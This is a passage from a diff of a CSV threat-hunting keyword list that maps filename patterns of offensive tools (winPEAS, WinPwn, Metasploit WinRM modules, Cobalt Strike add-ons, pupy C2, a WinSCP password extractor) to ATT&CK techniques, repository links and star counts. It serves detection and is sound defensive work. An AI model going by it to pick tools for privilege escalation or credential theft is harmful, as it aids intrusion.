Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*WinPEAS.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*winPEAS.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*winPEAS.ps1*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*winPEAS.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*winPEAS.bat*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*WinPEAS.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEAS.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*winPEAS.ps1*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEAS.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*winPEASany.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*winPEASany.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*winPEASany.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*winPEASany_ofs.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*winPEASany_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*winPEAS-Obfuscated*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*winPEASps1*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*winPEASany_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEAS-Obfuscated*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASps1*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*winPEASx64.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*winPEASx64.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*winPEASx64_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*winPEASx64.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*winPEASx64_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*winPEASx86.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*winPEASx86.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*winPEASx86.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*winPEASx86_ofs.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*winPEASx86_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*Win-PS2EXE.exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*WinPwn -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*WinPwn.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*WinPwn.ps1*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*WinPwnage*","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1203 - T1059 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","2498","386","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z" -"*winpwnage.functions*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*winPEASx86_ofs.exe*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*Win-PS2EXE.exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*WinPwn -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*WinPwn.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*WinPwn.ps1*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*WinPwnage*","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1203 - T1059 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","2498","388","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z" +"*winpwnage.functions*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*winreconstreamline.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" -"*winregistry.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*winrm_command_shell.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*winrm_script_exec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*winregistry.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*winrm_command_shell.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*winrm_script_exec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*winrmdll *","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","0","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*winrmdll.*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*WinSCPPasswdExtractor*","offensive_tool_keyword","WinSCPPasswdExtractor","Extract WinSCP Credentials from any Windows System or winscp config file","T1003.001 - T1083 - T1145","TA0003 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/NeffIsBack/WinSCPPasswdExtractor","1","1","N/A","N/A","1","8","0","2023-07-01T17:27:32Z","2022-12-20T11:55:55Z" "*WinShellcode.git*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","","N/A","","","" "*WinShellcode-main*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","","N/A","","","" -"*Winsocky-main*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","79","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*Winsocky-main*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*WINspect.ps1*","offensive_tool_keyword","WINspect","WINspect is part of a larger project for auditing different areas of Windows environments.It focuses on enumerating different parts of a Windows machine to identify security weaknesses and point to components that need further hardening.can be used by attacker ","T1018 - T1082 - T1057 - T1547.001 - T1053","TA0003 - TA0006 - TA0008 - TA0010","N/A","N/A","Information 